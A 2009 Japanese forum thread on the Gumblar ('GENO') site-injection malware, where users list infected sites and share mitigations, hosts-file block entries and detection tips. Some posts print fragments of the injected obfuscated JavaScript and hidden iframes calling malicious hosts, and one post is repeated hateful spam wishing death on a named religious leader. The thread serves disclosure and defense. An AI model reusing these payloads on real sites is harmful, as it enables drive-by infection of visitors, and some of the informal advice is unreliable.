2のログでAVASTがうぃーんうぃーんするのは慣れてるからコードとは思ったが
知らない人は驚くな

118 :192.168.0.774:2009/05/18(月) 18:45:17 ID:3Wf1BgQ0O
>>94
感染してるの気付きにくいから

119 :192.168.0.774:2009/05/18(月) 18:45:24 ID:7k/9HGtp0
ここの住民はほとんどセキュ板と同じだと思ってたけど違うのな

120 :192.168.0.774:2009/05/18(月) 18:45:56 ID:wU1qChfhP
単純に文字列追ってるんだな>avast

121 :192.168.0.774:2009/05/18(月) 18:46:17 ID:ivBmAr0O0
>>104
とりあえず魚拓取っておいた。
このCGIにバックアップ機能があるのかわからないが、
もしないなら定期的に魚拓取っておいてそこから復旧すればいいんでないか

122 :192.168.0.774:2009/05/18(月) 18:46:26 ID:3Wf1BgQ0O
>>109
もうあっちは隔離スレになったよ

123 :192.168.0.774:2009/05/18(月) 18:46:28 ID:cNzce2cIP
p2使っている俺はどうすれバインダー

124 :192.168.0.774:2009/05/18(月) 18:46:39 ID:ua7Ctj4Z0
p://www■mikesquarter■com/

感染確認したが、海外のサイトな上、コンタクトが(感染するスクリプトのあるページの)フォームなので、
サイト管理者への連絡はパス。

125 :192.168.0.774:2009/05/18(月) 18:47:05 ID:8GKrEP5/O
専ブラじゃないんだが

126 :192.168.0.774:2009/05/18(月) 18:47:14 ID:bV3w8TeO0
おい、ここもかよ
コード貼るなら無効にしてからはれよ



127 :192.168.0.774:2009/05/18(月) 18:48:25 ID:lbjdJxFz0
検体スレにも書きましたが、

F-Sercure SAS登録分の回答で、
検体報告のあったmartuz.cn新種(2009/05/17版)については次回DB更新にて対応とのこと。

128 :192.168.0.774:2009/05/18(月) 18:49:22 ID:nYc6GBj10
ほんと無能やつってジャマだわ
黙って無効化ろよ

129 :192.168.0.774:2009/05/18(月) 18:53:48 ID:fOCJVXyt0
>>78
うちのアバたんが全く反応しない

130 :192.168.0.774:2009/05/18(月) 18:56:45 ID:eM8L/6820
ttp://genolists.alink.uic.to/ ここの鉄道110号のページは確定↓

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://gumblar.cn/rss/%3Fid%3D&client=chromium&hl=ja

131 :192.168.0.774:2009/05/18(月) 18:59:41 ID:EGMN69Mk0
昨日、>>2の感染予防対策 とIEのスプリクトをよく解らないから全部無効にした後
やけにパソコンが重いからタスクマネージャーで調べたら

cmdが勝手に起動
カスペルのアップデートが30分経っても5%
Windows Updateサイトも最終段階で弾かれる
ワンケアも弾かれた

cmdを閉じWindows Updateの指示にしたがい操作したら無事Update終了
常駐させてるカスペルも元に戻った

sqlsodbc.chmのサイズは問題なし。再起動も問題なく出来た
ワンケアのオンラインスキャンだけはまだ出来ない・・・
情弱なので感染してるのかしてないのか謎



132 :192.168.0.774:2009/05/18(月) 19:01:00 ID:jTJy2IbM0
>>109
向うは早すぎて、時間が無いとついていけない
あっちは流し読みして、こっちをメインの情報源にしてる

133 :192.168.0.774:2009/05/18(月) 19:01:01 ID:XBZCbjSj0
ttp://www.3nell.net/geno/
genoウイルス臨時できてるよ

134 :192.168.0.774:2009/05/18(月) 19:02:46 ID:7k/9HGtp0
fc2公式で注意促してんのな
ttp://web.fc2.com/
既出?

135 :192.168.0.774:2009/05/18(月) 19:03:38 ID:nup6y9oC0
>>134
既出だな

136 :192.168.0.774:2009/05/18(月) 19:04:27 ID:8osgued70
>>131
してないと思うよ

137 :192.168.0.774:2009/05/18(月) 19:04:47 ID:QTaoO352O
>>101
このコードを他スレに貼って遊んでる奴が居るぞ

138 :192.168.0.774:2009/05/18(月) 19:04:47 ID:eOHkXG3n0
>>134
このスレでは初。
fc2は、トップで注意しかしないのか?
ブログ所有者ににメールおくったりしないのか?

139 :192.168.0.774:2009/05/18(月) 19:05:02 ID:tx4jLtmT0
fc2はずっと前から注意促してたぞ
少なくとも5月頭くらいには

140 :192.168.0.774:2009/05/18(月) 19:05:03 ID:fJpq/HP00
>>53
確認したがウイルスは存在しなかった

141 :192.168.0.774:2009/05/18(月) 19:05:31 ID:eM8L/6820
聖帝♂♂検索これも確定

(function(ajr0d){eval(unescape(('>76ar>20a>3d>22>53cript
E>6eg>69ne>22>2c>62>3d>22>56ers>69>6f>6

142 :192.168.0.774:2009/05/18(月) 19:07:54 ID:TK3Lbxib0
結局sqlsodbc.chmを書き換えないタイプのって見つかってるのかな?

143 :192.168.0.774:2009/05/18(月) 19:08:00 ID:7k/9HGtp0
そかすまん
まぁ、fc2に感染者多いから当然とはいえちょっとだけfc2に好感を持った

144 :192.168.0.774:2009/05/18(月) 19:08:43 ID:YyHm/Ikn0
>>138
日付間違えてる
FC2は今朝のブログのメンテ日付も1日ずらして予告してらから、
社員全員ずれてるのかもだがw

145 :192.168.0.774:2009/05/18(月) 19:08:50 ID:z6TrTMtw0
今日もGENOウイルスまとめWiki重かったら、ミラー作ってもいいかね?

146 :192.168.0.774:2009/05/18(月) 19:09:50 ID:wS9NmmFE0
fc2未来に生きてるw

147 :192.168.0.774:2009/05/18(月) 19:10:04 ID:EGMN69Mk0
>>136
大丈夫ですかね少し安心しました

148 :192.168.0.774:2009/05/18(月) 19:10:19 ID:7k/9HGtp0
>>144,146
それはたぶんfc2が日本にないからだと思うんだ
ttp://fc2.com/company.html

149 :192.168.0.774:2009/05/18(月) 19:10:47 ID:lbjdJxFz0
以下感染済みを確認。
kitagawadaisuke (トップページとコンサートページ以外が感染されてることを確認)
loca.zombie.jp(トップページ)



150 :192.168.0.774:2009/05/18(月) 19:11:01 ID:eOHkXG3n0
>>144
今日の日付が分かっていないfc2の社員は嫌過ぎるw

151 :192.168.0.774:2009/05/18(月) 19:11:53 ID:eOHkXG3n0
>>145
いいと思うけど、なるべく軽いのお願い。

152 :192.168.0.774:2009/05/18(月) 19:13:06 ID:+lw3mpsu0
>>134
日付間違ってるね。

153 :192.168.0.774:2009/05/18(月) 19:14:01 ID:8FweN4seO
FC2、アク解からリンク元に飛ぶ時のページにも注意書き増えたよな?


ソフォス使ってるんだけど更新出来てるのか不安なんでアバスト入れたいんだけど、競合するかな?

154 :192.168.0.774:2009/05/18(月) 19:14:16 ID:buCstTcZ0 ?2BP(0)
これ実行してみ

printf("%02X %02X\n",*(BYTE*)WSASend,*(BYTE*)send);
LoadLibrary("winmm.dll");
Sleep(1000);
printf("%02X %02X\n",*(BYTE*)WSASend,*(BYTE*)send);

いまの常駐仕様なら…。

155 :192.168.0.774:2009/05/18(月) 19:14:57 ID:YyHm/Ikn0
>>148
それは元から
主なユーザーが日本なのも元から

お知らせとかも普段は間違えてないんだよ
先週末くらいからおかしいの

156 :192.168.0.774:2009/05/18(月) 19:17:25 ID:Lg+8KOH80
・対処済みor対処中or元から白?
手書きブログ
livmail
スカイハイプレミアム
Carwash
成美○出版
テイアラモード
帰ってき○三日天下
烏骨鶏
株式会社まどか
リボンマジック
ALFA alfa-radio.com
TALK LIVE ANIMATED

・404
Akemi ○ayashi Website

・未確認の中の黒確定
loca.zombie.jp

・重複登録
Replica
Tシャツ通販サイト
kitagawadaisuke
主上支局−小野不由美さーち−

主上支局はカスペが見せてくれなかったので、GENOに感染してるかどうかは不明

157 :192.168.0.774:2009/05/18(月) 19:17:37 ID:FZ3y7xe60
火狐でアクセスしたら怒った!w

158 :192.168.0.774:2009/05/18(月) 19:19:20 ID:z6TrTMtw0
とりあえず登録だけした
http://wikiwiki.jp/geno/
まだパス作成されてないからたぶん今はアクセスできないと思う

159 :192.168.0.774:2009/05/18(月) 19:21:08 ID:cA8ZyJkp0
>>95
Jane Styleは警告でない。出た人いる?
Janeのフォルダは検査除外にはしてない
Fxで開くとAVASTさん劇怒りだったのでAVASTさんは生きていると思われるが

160 :192.168.0.774:2009/05/18(月) 19:21:24 ID:wU1qChfhP
スレに挙がってる感染してるページ見て回ってるけど、
全部</head>と<body>との間なんだな

161 :192.168.0.774:2009/05/18(月) 19:21:47 ID:8GKrEP5/O
>>156
確定情報?

162 :192.168.0.774:2009/05/18(月) 19:23:05 ID:I7+FOOqT0
グーグルの画像検索で感染サイトの画像が出てもだいじょうぶですか?

163 :192.168.0.774:2009/05/18(月) 19:24:41 ID:TM5Ovwjd0
>>162
画像は別に問題ない

164 :192.168.0.774:2009/05/18(月) 19:24:56 ID:eM8L/6820
>>156
主上支局は↓
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://ssfos.hp.infoseek.co.jp/&client=chromium&hl=ja

165 :192.168.0.774:2009/05/18(月) 19:26:49 ID:z6TrTMtw0
>>164
そのサイト怪しすぎるだろ
hXXp://basesrv.net/bin/in.php
謎のURLあるし

166 :192.168.0.774:2009/05/18(月) 19:28:05 ID:ua7Ctj4Z0
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。

●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。

●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。

その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。

167 :192.168.0.774:2009/05/18(月) 19:30:04 ID:lbjdJxFz0
>>160
書こうとおもったら>>166であがってた…OTL

168 :192.168.0.774:2009/05/18(月) 19:31:14 ID:wU1qChfhP
>>161
とりあえず、loca■zombie■jp は黒

169 :192.168.0.774:2009/05/18(月) 19:31:54 ID:z6TrTMtw0
とりあえずssfos●hp●infoseek●co●jpにあったもの
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2F000007.ru%2Fin.cgi%3F2
rame src="hXXp://basesrv.net/bin/in.php" width=1 height=1 style="visibility:hidden"
q="=hgs`ld!rsb<iuuq;..c`rdrsw/odu.cho.ho/qiq!vheui<0!idhfiu<0!ruxmd<&whrhchmhux;iheedo&?=.hgs`ld?";w="";for(i=0;i<q.length;i++){w=w+String.from
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fipredator.ru%2F7%2Fin.cgi%3F3%22%20width%3D%2
http://theoschepens.nl/phpmycounter/the
など
アドレス少し加工済み

170 :192.168.0.774:2009/05/18(月) 19:33:06 ID:wU1qChfhP
>>166-167
サンクス

171 :169:2009/05/18(月) 19:33:23 ID:z6TrTMtw0
すまん非常に怪しいPHPカウンター(?)のURL加工忘れてた

172 :192.168.0.774:2009/05/18(月) 19:34:22 ID:fJpq/HP00
ソースチェッカー
http://so.7walker.net/guide.php
あやしいサイトはここで見れ

173 :192.168.0.774:2009/05/18(月) 19:35:52 ID:KeDzETgR0
>>111
ついさっき7.01.03.221が来た

174 :192.168.0.774:2009/05/18(月) 19:36:04 ID:YyHm/Ikn0
>>172
そこ負荷すごいらしくて、さっき使おうとしたら一時規制食らったw

175 :192.168.0.774:2009/05/18(月) 19:37:38 ID:I7+FOOqT0
>>172
GENOウイルス感染サイトのチェック増加により、サイトへのアクセスが集中しています。

なお、この新ウイルスに対してSCOのチェックフィルタは対応しておりません。
(ソースが難読化されている上に、パターンがすべて違うためです。。。)

簡単な判別方法としてはHTMLソース内JavaScript記述部分に、
「unescape」や「eval」といった文字列が含まれ、
意味不明な文字列が続いていれば危険とみなしてよいでしょう。

176 :192.168.0.774:2009/05/18(月) 19:38:44 ID:eM8L/6820

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://theoschepens.nl/phpmycounter/the&client=chromium&hl=ja
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://basesrv.net/&client=chromium&hl=ja

177 :192.168.0.774:2009/05/18(月) 19:42:49 ID:sj2fudv60
セキュ板のスレが機能していないので、こっちに書き込んでみる

------------------------------------------------------

Genoウィルスってブラウザ上からPDFを立ち上げるのか、それとも単独でAdobeReaderを立ち上げるのかどっち?

役に立つかわからんが、もし前者だとしたら、Firefox のアドオン→プラグインからAdobe Acrobatを無効化することで
ブラウザ上でPDFが開けなくなり、代わりにダウンロードウィンドウが立ち上がるので、意図しないダウンロードを予防できる気がしてきた。



178 :192.168.0.774:2009/05/18(月) 19:43:08 ID:0mxzuWZe0
聞きたいことがあるんだが

感染したやつが感染したPCでwikiとか編集したら
そのwikiって感染すんの?

179 :192.168.0.774:2009/05/18(月) 19:44:21 ID:TM5Ovwjd0
>>177
前者
>>178
それはない

180 :192.168.0.774:2009/05/18(月) 19:46:23 ID:0mxzuWZe0
>>179
ないのか
勘違いだったようだな、サンクス

181 :192.168.0.774:2009/05/18(月) 19:49:33 ID:sj2fudv60
>>179
thx
これでReaderからの侵入は確実に潰せそうだ。

182 :192.168.0.774:2009/05/18(月) 19:54:42 ID:IIOUtcG/0
>>181
何かものすごい勘違いをしているような気がしないでもない

183 :192.168.0.774:2009/05/18(月) 19:57:06 ID:+m52NSIq0
てか感染ルートってPDFとFlashだしな
よく使われる手としてJavaScript経由ってのがあるだけだし

184 :192.168.0.774:2009/05/18(月) 20:00:25 ID:DAUvXCDv0
>>・Adobe Flash Player をブラウザごとに最新(10.0.22.87)にする。
これのやり方がよくわからないので教えてもらえませんか?
ブラウザはFirefox3.0.10です

185 :192.168.0.774:2009/05/18(月) 20:02:45 ID:BZ5+cjSr0
>>122
ニュー即・・・XP厨vsVista厨状態
同人・・・・・・自分ルール押しつけで話が混乱し、ループしてる
セキュ板・・・VIPっぽい状態

186 :192.168.0.774:2009/05/18(月) 20:03:37 ID:TM5Ovwjd0
>>184
flash playerでぐぐった一番上のサイト見て見ろ

187 :192.168.0.774:2009/05/18(月) 20:04:53 ID:wU1qChfhP
>>184
IE と Firefox 別々にアクセスしてダウン→インスト
ttp://get.adobe.com/jp/flashplayer/

インストする前に、ブラウザは終了しとく


188 :192.168.0.774:2009/05/18(月) 20:05:12 ID:duGXzOvm0
>>185
むむお主セキュ板の方にいるだろ

189 :192.168.0.774:2009/05/18(月) 20:06:05 ID:DAUvXCDv0
>>186,187
ありがとうございます

190 :192.168.0.774:2009/05/18(月) 20:06:11 ID:tFgIi2z+0
ごめん寝てた
リンク作った人だけど何かやることある?

191 :192.168.0.774:2009/05/18(月) 20:06:26 ID:KMNBjNoi0
>>184
今から入るよ。今入ったよ。ほら、半分入ってるよ。

192 :192.168.0.774:2009/05/18(月) 20:08:13 ID:rPxed0O+0
感染リンク集立てた奴、白は消した方がいいんじゃないか
っつーかパスかけてないなら俺らも消せるのか?
http://genolists.alink.uic.to/

193 :192.168.0.774:2009/05/18(月) 20:08:24 ID:7k/9HGtp0
>>190
修正済みのやつとか誤報告とか消して

194 :192.168.0.774:2009/05/18(月) 20:08:27 ID:9rsvt0n10
バスターまだ動かないんかな
他のとこは動き出したんだっけ?ノートン先生とか

195 :192.168.0.774:2009/05/18(月) 20:09:04 ID:GCzc7qM00
そろそろ言っておきたいんだけど
「GENOウイルス」って言うのは正確に説明できない(USBウィルスと同じ)言葉なので使うの止めよう
現象、対策も間違っているの多すぎ!
だからWisdom of Crowdになり得ないんだよ2chは…

196 :192.168.0.774:2009/05/18(月) 20:09:33 ID:VXjO+9fU0
JavaScriptを切るとyoutubeやニコ動などの動画が見れなくなって不便って書き込みいくつかあったけど
AdobeReaderの環境設定で「Acrobat JavaScriptを使用」のチェック外してOKしても問題なく動画見れるんですが
これってJavaScriptを切れてないってことでしょうか?

197 :192.168.0.774:2009/05/18(月) 20:10:00 ID:/sQ3yN+j0
A
1.js - javaScript無効
2.id=2(reader) - reader最新,Flash最新
3.id=10(exe) - antivirussoft対応待

B
1.IPblock - hosts,router,FW,IPfilteringsoft
2.etc - firefox,NoScript,ABP,vista

198 :192.168.0.774:2009/05/18(月) 20:13:32 ID:wU1qChfhP
>>195
間違っている思うのは、ぜひ報告してほしい

199 :192.168.0.774:2009/05/18(月) 20:14:31 ID:tFgIi2z+0
取り敢えず対策済みor誤報告用のカテゴリ作っておいた
登録されてるサイトの中で当てはまるのがあれば突っ込んでくれれば、感染確認カテゴリから削除しておくぜ

200 :192.168.0.774:2009/05/18(月) 20:15:04 ID:BZ5+cjSr0
>>188
いいえ、メインはニュー即です。向こうに間違えて書き込んじゃったの、見てますよね。

しかしNorton先生、毎度毎度細かい更新があって、専ブラが読み込んだVBSナントカには敏感に反応するのに
このスレのコードには全く反応なしですね。なんか不安になってきます。

201 :192.168.0.774:2009/05/18(月) 20:15:14 ID:eOHkXG3n0
そんなこと今から、GENOウイルスではなくて
別の名前にしろといわれても。

202 :192.168.0.774:2009/05/18(月) 20:16:12 ID:JmCcr4Q60
>>196
JavaScriptを切れてない

ブラウザ(IEやらOperaやらFireFoxやら)のJavaScriptも切るんだ
そうすっとニコ動等見れなくなる(対策としては正常)

203 :192.168.0.774:2009/05/18(月) 20:16:32 ID:EL5bXFK40
前スレの822-823
いくらJavaScriptが効いてたとはいえ
何気に最新Adobeが突破されてるのは結局どうなったんだろう



204 :192.168.0.774:2009/05/18(月) 20:16:59 ID:4I1CdU820
前スレのVISTAでの話しですが
>>951
「パスおよびファイル名が正しいか確認してください」って出て保存できない。
上書き保存だよね?
自分、常に管理者でログインしてるはずなんだけどな…




205 :192.168.0.774:2009/05/18(月) 20:17:04 ID:buCstTcZ0
GENO系って呼ぶようにはしてるけど
GENOが作ってるわけでもないが、GENOに起爆点が感染したことで、
この界隈で一気に有名になったんだな

206 :192.168.0.774:2009/05/18(月) 20:17:48 ID:XTSMt63n0
>>196
Adobe Readerはpdf形式のファイルを見るviewer
なので、Adobe Readerのjavascrpitを無効にしたら、pdf形式の脆弱性をつくケースは対応される。

他の人が言っている javascritp を切るは IE や Firefox などの ウェブブラウザーの設定のことを言っている。

で、フラッシュ動画が普通に見られてるということは、ブラウザーの設定で javascrpt が有効になったまま。

207 :192.168.0.774:2009/05/18(月) 20:18:08 ID:uRd9mOOs0
>>203
え、突破されたの?

208 :192.168.0.774:2009/05/18(月) 20:18:36 ID:9T8t/wwO0
>>204
Vista使ってないからエスパーレスだけど、ファイルが書き込み禁止とかなってない?
あるいは管理者なのに書き込み権限が無いとか(これは多分無い)

209 :192.168.0.774:2009/05/18(月) 20:18:59 ID:KMNBjNoi0
>>207
クズは黙ってろ

210 :192.168.0.774:2009/05/18(月) 20:19:26 ID:S4JQD6PZ0

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね


211 :192.168.0.774:2009/05/18(月) 20:20:49 ID:rPxed0O+0
>>199
じゃとりあえず>>156

あと
306 名前:名無しさん@ゴーゴーゴーゴー![sage] 投稿日:2009/05/18(月) 18:36:14 ID:/b1kbV3H0
ttp://genolists.alink.uic.to/に晒されてる疑いのあるサイト検証してきたよ

ALFA …… 白 ソースチェッカーの誤反応と思われ
Tシャツ通販サイト …… 黒 感染確認
kitagawadaisuke …… 白 ソースチェッカーの誤反応と思われ
TALK LIVE ANIMATED …… 白 ソースチェッカーの誤反応と思われ
loca.zombie.jp …… 黒 感染確認
主上支局−小野不由美さーち …… 黒 感染確認 複数感染確認

管理人さん見てたら白のサイトは消して下さい
ソースチェッカーの結果鵜呑みにするのはやめたほうがいいと思う

309 名前:名無しさん@ゴーゴーゴーゴー![sage] 投稿日:2009/05/18(月) 18:46:39 ID:/b1kbV3H0
ごめん306だけど
kitagawadaisuke …… 白 ソースチェッカーの誤反応と思われ
これは間違い
TOPページは無事だがその下が全部感染してる

でももう確定済みにあがってたね

212 :192.168.0.774:2009/05/18(月) 20:21:49 ID:4I1CdU820
>>208
>ファイルが書き込み禁止とかなってない?
これを確認する方法もわからない。

誰かーVISTAの人ーーー

213 :192.168.0.774:2009/05/18(月) 20:22:57 ID:gM07vQcn0
pixivがリスト入ってるけど、誰かJavascriptの確認できた?
こちらではなかなか確認できない

214 :192.168.0.774:2009/05/18(月) 20:23:44 ID:eOHkXG3n0
2009-05-18
噂を鵜呑みにしてはいけません
Fx一般
FirefoxがGENOウィルス騒動のとばっちりを受けているようなので、基本的なことを確認しておきたい。

Firefoxの先読み機能は、Webページ内に個別の指定がある場合にだけはたらく。
ただし、より一般的な先読み機能を提供するアドオンは存在する。
仮に先読み機能が働いた場合でも、読み込んだページのスクリプトをあらかじめ実行したりはしない。
Firefox 3.5に搭載されるDNSプリフェッチ機能は、ページ自体の先読み機能とは別物。

215 :192.168.0.774:2009/05/18(月) 20:24:32 ID:nW5WlAwR0
>195

これだけ知識のある人たちが無報酬で対策を練ってくれてるってネットならではのことで、
私は凄いと思ってるけどね。
情報が錯綜しているわけだから、間違いがあっても当然だし、呼び名なんかにこだわる
必要あるのかな。
正確に説明できないって意味がよくわからないけど、とりあえず通称として流布してるん
だから、それを使うのに問題あるとも思えないんだけど・・・

216 :192.168.0.774:2009/05/18(月) 20:26:20 ID:phP+MH5H0
これまでこの攻撃についてzlkon.lvとかgumblar.cnとかmartuz.cnとか言われてるが、
どれも攻撃サーバの名前であってコロコロ変わっていく。
最近JS:Redirector-H*なんて呼び方もあるようだけど、
これは不正に挿入されたJSコードを指しているだけで攻撃の全貌を現してはいない。

一方、「GENOウィルス」という呼び方は4月の発見当初から使われていて
このキーワードで検索した場合の情報量の蓄積も馬鹿にならない。
今回の攻撃の総称として、もう日本語圏では「GENOウィルス」でいいんじゃないかと思う。

217 :192.168.0.774:2009/05/18(月) 20:26:36 ID:Uvd5wKih0
pixiv追加した人は「一部ページ」がどこなのか詳細をください

218 :192.168.0.774:2009/05/18(月) 20:26:47 ID:4ySopLDi0
スレ更新でavastが反応してチェストに入るファイルは危なくないの?

219 :192.168.0.774:2009/05/18(月) 20:27:14 ID:TM5Ovwjd0
>>213
見てみたが別に異常なさそうだが
google-analyticsで誤検知したんじゃないか

220 :192.168.0.774:2009/05/18(月) 20:27:58 ID:tFgIi2z+0
二件を対策済み、pixivを疑いに移動ー

221 :192.168.0.774:2009/05/18(月) 20:28:23 ID:TM5Ovwjd0
>>218
チェストはウィルスが入っていても大丈夫な場所

222 :192.168.0.774:2009/05/18(月) 20:32:20 ID:4ySopLDi0
>>221 回答ありがとう。えーとそのチェストに入ってるファイルをデスクトップに出しても大丈夫なのかな。
気になってるのは更新で検出されたファイルが誤検出かどうか知りたい。

223 :192.168.0.774:2009/05/18(月) 20:33:44 ID:eOHkXG3n0
908 名前:GENO[sage] 投稿日:2009/05/18(月) 20:12:02 ID:ViAG4CWw0 (PC)
幾つか感染サイトのソースをチェッカー挟んで見てみた。
正規表現検索が可能なソフトを使えばローカルでの簡易チェックが可能と思われます。

正規表現例:[Dreamweaver]
\(function\(.*?\)\{(var)*

(function(0〜いくtかの文字列){var
上記で検索してヒットしたソースに覚えが無ければ怪しい。

ウィルスチェッカーが0%出したところでウィルスのソースがあったので
ツールに頼らず視認しとく方が吉と思う。

224 :192.168.0.774:2009/05/18(月) 20:35:08 ID:A6eu+XQA0
名前を使われると困る人達もいるって事だろう。
不名誉だしね。

225 :192.168.0.774:2009/05/18(月) 20:35:14 ID:TM5Ovwjd0
>>222
出すだけなら別にかまわんが
誤って実行したら知らんぞ

226 :192.168.0.774:2009/05/18(月) 20:36:35 ID:XTSMt63n0
>>212
右クリックでプロパティー

というか、
> これを確認する方法もわからない。
お前さんはWindows Update以外何もしないほうが良い

227 :192.168.0.774:2009/05/18(月) 20:37:18 ID:8osgued70
>>218
スレ更新で反応してるやつは気にしなくていいよ
頭おかしいのが反応するコード書いて喜んでるだけだから

228 :192.168.0.774:2009/05/18(月) 20:37:27 ID:4ySopLDi0
>>225 まじか・・・つまり今回はやりのコードを書き込むだけでウイルスがはいってくるのかな。

229 :192.168.0.774:2009/05/18(月) 20:40:23 ID:oH14GReB0
>>190
感染確定に入ってる一番下のreplicaと、対策済みのreplicaが重複してるんで片方消しててクレクレ

230 :192.168.0.774:2009/05/18(月) 20:41:12 ID:n99n8vmI0
>>228
んなわけなーだろ

231 :192.168.0.774:2009/05/18(月) 20:41:51 ID:lbjdJxFz0
>>127
綴り間違ってた…F-Sercureってなによ… OTL

F-SecureのDB更新されたけど、id10が対応されていない現状…OTL
id2は Exploit.Win32.Pidief.auw で対応。



232 :192.168.0.774:2009/05/18(月) 20:42:26 ID:IrQAOVFw0
いまさらちょっと聞きづらいんですが
IEよりFirefoxにしたほうが良いってよく書いてあるのはJS切り易いから?
他にも何か良いことあるのかな?

233 :192.168.0.774:2009/05/18(月) 20:43:37 ID:/U0UmsNW0
ググレカス

234 :192.168.0.774:2009/05/18(月) 20:43:55 ID:gHdwI20D0
>>228
チェストに入ったのが専ブラのスレログなら、それは問題ないんじゃね。
アフォが書き込んだ文字列に反応してるんだろ

235 :192.168.0.774:2009/05/18(月) 20:45:07 ID:zK5dEXlg0
ここはいつから質問スレになったんだろ

236 :192.168.0.774:2009/05/18(月) 20:45:44 ID:wU1qChfhP
pixivは実質白だろ。一部ページってホントどこだ?

237 :192.168.0.774:2009/05/18(月) 20:46:24 ID:enUpbFMt0
他だと基地外多いからじゃね
前スレでも見てろって感じだが

238 :192.168.0.774:2009/05/18(月) 20:46:44 ID:WzIrOxQoO
馬鹿が大量に流れてきたからだろ

239 :192.168.0.774:2009/05/18(月) 20:47:29 ID:9T8t/wwO0
*.cnで中国全部拒否出来たらいいのに・・・・
ルータもFWもこの記述出来ない

240 :192.168.0.774:2009/05/18(月) 20:48:50 ID:+m52NSIq0
そこでPeerGuardian2ですよ?

241 :192.168.0.774:2009/05/18(月) 20:50:24 ID:gHdwI20D0
初心者板にでも質問スレ立てた方がいいな

242 :192.168.0.774:2009/05/18(月) 20:50:44 ID:UniNnZ5w0
まとめ見に行きたいけど怖くて踏めない

243 :192.168.0.774:2009/05/18(月) 20:51:15 ID:kA5lVKLe0
>>232
> IEよりFirefoxにしたほうが良いってよく書いてあるのはJS切り易いから?
まぁ、そんなところ。その辺を自分で管理できるなら、IEでもいいと思うよ。

244 :192.168.0.774:2009/05/18(月) 20:51:19 ID:pmy1O3A40
>>242
まとめは管理者以外編集できないようにしてるから今は大丈夫

245 :192.168.0.774:2009/05/18(月) 20:51:48 ID:RCHjlpg60
>>242
そこまで信用できないなら解決するまでネット繋ぐなとしか言えんのだが…

246 :192.168.0.774:2009/05/18(月) 20:51:50 ID:yKeLT0rF0
リンク集どうなってんの?
帰ってき○三日天下、まだ黒いんだけど
短時間で対処&また感染したのか?
あと主上支局が二つあるよ

247 :192.168.0.774:2009/05/18(月) 20:51:51 ID:9T8t/wwO0
>>240
それ初めて聞いたから早速調べて来た
かなり便利そうだけどバスター入れてるから併用トラブル怖いんだよねえ・・・・
もうちょい調べて検討してみる、教えてくれてthx

248 :192.168.0.774:2009/05/18(月) 20:52:57 ID:+psJy0jj0
色々情報が混乱してるからではないの
調べ物で前スレとか見ても良いと悪いと両方書いてあったりと

249 :192.168.0.774:2009/05/18(月) 20:53:27 ID:4I1CdU820
>>226
どこの画面で右クリックプロパティ?
オラワガンネ

250 :192.168.0.774:2009/05/18(月) 20:54:07 ID:UniNnZ5w0
>>244
トン 今から見てきます

>>245
wikiに昨日愉快犯がいたみたいでgkbrでした

251 :192.168.0.774:2009/05/18(月) 20:54:09 ID:nup6y9oC0
>>204
951 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 14:44:33 ID:k2CI1leb0
>>945
こんなんでどうだろう。

Vistaでhostsを編集する方法

スタートメニュー→すべてのプログラム→アクセサリ→メモ帳
の上で右クリック

「管理者として実行」を選択

「ファイル」メニュー→「開く」

ファイルの種類を「テキスト文書(*.txt)」から「すべてのファイル(*.*)」に変更

C:\Windows\System32\drivers\etc\hosts
を開く

以下の行を追加し、保存終了
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn

前スレから vistaでおんなじ症状だったけどこれでできたよ

252 :192.168.0.774:2009/05/18(月) 20:54:30 ID:KxPBQ8Is0
pixivのスクリプト見て回ったけどインジェクションないっぽ

253 :192.168.0.774:2009/05/18(月) 20:54:40 ID:yKeLT0rF0
>>248
URL先はソース見れば一発でわかるんだが、たいした数じゃないし
帰ってき○三日天下に至っては、avestが反応するし

254 :192.168.0.774:2009/05/18(月) 20:56:53 ID:enUpbFMt0
>>249
お前はLANケーブル引っこ抜いてろ

255 :192.168.0.774:2009/05/18(月) 20:57:57 ID:jb9+lqSe0





 同 人 板 の 腐 女 子 は 帰 れ ! !






256 :192.168.0.774:2009/05/18(月) 20:58:17 ID:ua7Ctj4Z0
セキュ板より転記

538 名無しさん@お腹いっぱい。 sage 2009/05/18(月) 19:22:05
感染サイトの管理人です

サイトの改ざんは3階層目までだな

545 名無しさん@お腹いっぱい。 sage 2009/05/18(月) 19:24:40
>>538
もうサイト消しちゃった?
もし消してないなら検体にご協力してくれ

584 名無しさん@お腹いっぱい。 sage 2009/05/18(月) 19:40:04
>>545
パスを変更後該当コードだけを削除したよ
再び改ざんされるか検証中
パスを変えない場合は感染PCを起動させてない状態でも該当コード削除後1時間で改ざんされた

257 :192.168.0.774:2009/05/18(月) 20:58:36 ID:z5yUImZ90
>>249
お前にパーソナルコンピュータはまだ早い
携帯で我慢しておけ

258 :192.168.0.774:2009/05/18(月) 21:00:01 ID:tFgIi2z+0
>>246
まじか
上に書かれてた白確認リストに従ったんだけど
また感染したんかねぇ、取り敢えず黒に移しとく

259 :192.168.0.774:2009/05/18(月) 21:00:06 ID:4I1CdU820
>>251
>「管理者として実行」を選択

この項目がないんだ・・
もう、そうめん食ってウイルスの事は忘れた方がいい?

260 :192.168.0.774:2009/05/18(月) 21:00:46 ID:+m52NSIq0
前スレ951
